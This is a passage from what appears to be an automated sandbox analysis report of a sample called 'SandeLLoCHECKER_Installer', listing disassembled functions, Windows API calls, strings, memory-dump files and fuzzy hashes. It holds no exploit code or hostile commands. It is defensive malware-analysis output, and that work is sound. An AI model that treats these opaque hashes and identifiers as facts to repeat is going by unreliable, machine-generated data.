                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionHeapRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3789339297-0
                                                                                                                        • Opcode ID: b5742986d7181bbf6e9f63d6b47348e380566066bb7b9769cf25db4edd86d084
                                                                                                                        • Instruction ID: d26c4d30b66075382838d980ff4f1be6e75a8f3d1c88610522852e2bd189979a
                                                                                                                        • Opcode Fuzzy Hash: b5742986d7181bbf6e9f63d6b47348e380566066bb7b9769cf25db4edd86d084
                                                                                                                        • Instruction Fuzzy Hash: 30F08235A48248FFC705CF54DC05F5ABBA8F708B14F104569F819C66A0DB35A9118A45
                                                                                                                        Function 00A2E1F7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00A35D4E,?,?,00A35D4E,00000220,?,?,?), ref: 00A2E229
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a59b8a0774b07fcbe7ea64d0e6d6182da98acf11b28289795b5d5c36a9d5a946
                                                                                                                        • Instruction ID: d3f9492a08c8ac394aecdbd9dddb2b711c551a40e764c89a053df2ecfb63a740
                                                                                                                        • Opcode Fuzzy Hash: a59b8a0774b07fcbe7ea64d0e6d6182da98acf11b28289795b5d5c36a9d5a946
                                                                                                                        • Instruction Fuzzy Hash: 19E0303264023196DF21BB6EBD05BDA275D9F423A0F154135EC1A96491EB20988087A0

                                                                                                                        Non-executed Functions

                                                                                                                        Function 009946B0 Relevance: 42.6, APIs: 14, Strings: 10, Instructions: 582filetimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,C7BA013E), ref: 0099470E
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CreateFileW.KERNEL32(00B31574,C0000000,00000003,00000000,00000004,00000080,00000000,C7BA013E,00B31550,00B31568,?), ref: 00994810
                                                                                                                        • GetLastError.KERNEL32 ref: 0099482D
                                                                                                                        • OutputDebugStringW.KERNEL32(00000000), ref: 009948A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CreateDebugErrorFileHeapLastLocalOutputProcessStringTime
                                                                                                                        • String ID: %04d-%02d-%02d %02d-%02d-%02d$CPU: $LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$UnkownCPU$server$workstation$x64$x86
                                                                                                                        • API String ID: 207360571-2109833052
                                                                                                                        • Opcode ID: 9dca2e0869c40acbc5448ede220b94a6fcdfc130e06c6b5dd11ce2aaf0db3a06
                                                                                                                        • Instruction ID: b4cc493aaec57f860f4f2e488ae1b643382aef56cda7618ac72f3062a74fbe0d
                                                                                                                        • Opcode Fuzzy Hash: 9dca2e0869c40acbc5448ede220b94a6fcdfc130e06c6b5dd11ce2aaf0db3a06
                                                                                                                        • Instruction Fuzzy Hash: 8F228D71A01209DFEB10DFA8CC45BAEBBB8FF44314F148269E815EB291EB749D41CB91
                                                                                                                        Function 008556E0 Relevance: 16.9, APIs: 11, Instructions: 416nativememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0085590B
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0085591B
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00855926
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00855934
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EB), ref: 00855942
                                                                                                                        • SetWindowTextW.USER32(00000000,00AAA29C), ref: 008559E1
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00855A16
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00855A24
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00855A78
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00855ADD
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,C7BA013E,00000000), ref: 00855B2F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3555041256-0
                                                                                                                        • Opcode ID: 0e8484b6aaf060ab80ad705b04db3b6ce1b2ffa4e6cff09dd5d8837a6aa4fbd7
                                                                                                                        • Instruction ID: f3ca04300a6a1d62620fd7d057e4bb4cb4cdb3003eb274be7d824692505714e6
                                                                                                                        • Opcode Fuzzy Hash: 0e8484b6aaf060ab80ad705b04db3b6ce1b2ffa4e6cff09dd5d8837a6aa4fbd7
                                                                                                                        • Instruction Fuzzy Hash: DCE1AE71A0060ADBDB10DF68CC58BAFBBB9FF44721F144229EC15E7291DB759904CBA1
                                                                                                                        Function 0093F7C0 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 367windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0093FA49
                                                                                                                        • SendMessageW.USER32(?,00000443,00000000), ref: 0093FAB3
                                                                                                                        • GetDC.USER32(00000000), ref: 0093FAD7
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093FAE2
                                                                                                                        • MulDiv.KERNEL32(?,00000000), ref: 0093FAEA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDeviceMessageSendWindow
                                                                                                                        • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                        • API String ID: 629137107-2319862951
                                                                                                                        • Opcode ID: 891dc18539d498e0eb458dd89d3ce4e74c8c4f931583d0c778182f7b3c71ff76
                                                                                                                        • Instruction ID: 9dbe53609d3a6ac231f1f171fc6fba75093115b10c7493b8c2ad647cd5db4e41
                                                                                                                        • Opcode Fuzzy Hash: 891dc18539d498e0eb458dd89d3ce4e74c8c4f931583d0c778182f7b3c71ff76
                                                                                                                        • Instruction Fuzzy Hash: 05D1BF31A00609AFEB18CF28CC55BEEB7B5FF89300F108269E559A7291DB746A45CF91
                                                                                                                        Function 009A4C70 Relevance: 9.2, APIs: 6, Instructions: 196fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,C7BA013E,?,00000000,00000000), ref: 009A4D41
                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 009A4D5C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1690352074-0
                                                                                                                        • Opcode ID: 928396005def7ee1e4b13bf2ee1775f0f30d5faac91004381f55a7c0aedbe6a1
                                                                                                                        • Instruction ID: 50e3516cb4a5e8afe185b6668accb251f1c6f8aa901fc6506bd29f62ef72334f
                                                                                                                        • Opcode Fuzzy Hash: 928396005def7ee1e4b13bf2ee1775f0f30d5faac91004381f55a7c0aedbe6a1
                                                                                                                        • Instruction Fuzzy Hash: 3D715C71A01648DFDB10DFA8C948BEEBBB8FF45324F148169E815EB291DB749A04CB91
                                                                                                                        Function 009444C0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 387fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000105), ref: 009445E4
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,C7BA013E,?), ref: 0094486C
                                                                                                                        • FindNextFileW.KERNEL32(000000FF,00000010,?,C7BA013E,?), ref: 009449C3
                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,C7BA013E,?), ref: 00944A22
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNameNextPathShort
                                                                                                                        • String ID: \\?\
                                                                                                                        • API String ID: 3979292098-4282027825
                                                                                                                        • Opcode ID: 321abd12051477494f133faddecbdc65fe46111a67d702d4423cf6ba2a5337ad
                                                                                                                        • Instruction ID: a14b26bdb36ee3eb5e94d5516e99e4f099bf884971cba9fc1e543ce6147a50eb
                                                                                                                        • Opcode Fuzzy Hash: 321abd12051477494f133faddecbdc65fe46111a67d702d4423cf6ba2a5337ad
                                                                                                                        • Instruction Fuzzy Hash: 8BF1B170D00259DFDB24DF68CC99BAEB7B4FF44304F108299E419A7291EB74AA84CF91
                                                                                                                        Function 00A158D7 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000C,00A157F3,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A158D9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15900
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15907
                                                                                                                        • InitializeSListHead.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15914
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15929
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15930
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1475849761-0
                                                                                                                        • Opcode ID: 671a541de4d4941ec9bfdbc7db99e599d31974e8962b05707392d632c44392be
                                                                                                                        • Instruction ID: 1cc9fe07afb035edb1edff77cc03849534f97a4a8a85587fcdb2df4d45115969
                                                                                                                        • Opcode Fuzzy Hash: 671a541de4d4941ec9bfdbc7db99e599d31974e8962b05707392d632c44392be
                                                                                                                        • Instruction Fuzzy Hash: C5F0A435B01601DFD7209FB9ED08F9677B8FB98B52F100039E942C7250EF70D8428660
                                                                                                                        Function 00960050 Relevance: 7.7, APIs: 5, Instructions: 240fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 009600A8
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000), ref: 009601A8
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00960245
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 0096026B
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 009602B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 352340201-0
                                                                                                                        • Opcode ID: db3649c932e17bdbe5a92139056a32f803267061d9d9b97b3e3f1c67e17cfc02
                                                                                                                        • Instruction ID: 495acdffc737ac00f2df4675f5ef44043e03e8470165a88d9a0e18941d9576f2
                                                                                                                        • Opcode Fuzzy Hash: db3649c932e17bdbe5a92139056a32f803267061d9d9b97b3e3f1c67e17cfc02
                                                                                                                        • Instruction Fuzzy Hash: 4971C671A00205DFDB14DF68CC99BAFB7B8FF95324F14862AE825D7281DB749A04CB51
                                                                                                                        Function 00A2E34A Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3213747228-0
                                                                                                                        • Opcode ID: 9e0b76cd5f3e377c6f2159358687fa5fc72b664d1f100b5c02f00f2f9645654f
                                                                                                                        • Instruction ID: d9282f7cd01a9c9c7f9bd53819cac26c5d0d4ad71d10d83af90d8a1726e880e3
                                                                                                                        • Opcode Fuzzy Hash: 9e0b76cd5f3e377c6f2159358687fa5fc72b664d1f100b5c02f00f2f9645654f
                                                                                                                        • Instruction Fuzzy Hash: D0B13832E042659FDB25CF6CE8817EEBBE5EF55314F14817AE804AB241E235DD81CBA0
                                                                                                                        Function 008635D0 Relevance: 6.1, APIs: 4, Instructions: 87timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • KillTimer.USER32(00000003,00000001,C7BA013E,?,?,?,?,00A437D4,000000FF), ref: 00863611
                                                                                                                        • GetWindowLongW.USER32(00000003,000000FC), ref: 00863626
                                                                                                                        • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00863638
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,C7BA013E,?,?,?,?,00A437D4,000000FF), ref: 00863663
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$CriticalDeleteKillSectionTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1032004442-0
                                                                                                                        • Opcode ID: 85c2bc65097087fdbdc0ac8326405f36fcec53058ff39a08c1473e6b452bd473
                                                                                                                        • Instruction ID: 54a2d67f92475cae31f2c89f18c860624454f5161db001fae515cb115b2552b3
                                                                                                                        • Opcode Fuzzy Hash: 85c2bc65097087fdbdc0ac8326405f36fcec53058ff39a08c1473e6b452bd473
                                                                                                                        • Instruction Fuzzy Hash: 8631C070A04646FBCB21CF24CD08B9ABBB8FF15320F144229E824E7791DB71EA15DB90
                                                                                                                        Function 0098A660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00000002,00AAA29C,00000000), ref: 0098A6D1
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00000002,0098A255,-00000001,00000078,-00000001), ref: 0098A70D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoInit_thread_footerLocale$HeapProcess
                                                                                                                        • String ID: %d-%s
                                                                                                                        • API String ID: 1688948774-1781338863
                                                                                                                        • Opcode ID: 73451e6e4b3003dc5e6d47c84578f9d6d1a90e61fb8dd3d203180f4d61575ed3
                                                                                                                        • Instruction ID: 0cfc63c1f47402980c65f8958b8a1feecbff35c80335a153615054caeedd957a
                                                                                                                        • Opcode Fuzzy Hash: 73451e6e4b3003dc5e6d47c84578f9d6d1a90e61fb8dd3d203180f4d61575ed3
                                                                                                                        • Instruction Fuzzy Hash: E231AD71A00609AFE704DF98CC49FAEBBB8FF44724F104669E115AB291EB719900CB91
                                                                                                                        Function 0085F850 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000004), ref: 0085F89E
                                                                                                                        • GetWindowLongW.USER32(00000004,000000FC), ref: 0085F8B7
                                                                                                                        • SetWindowLongW.USER32(00000004,000000FC,?), ref: 0085F8C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
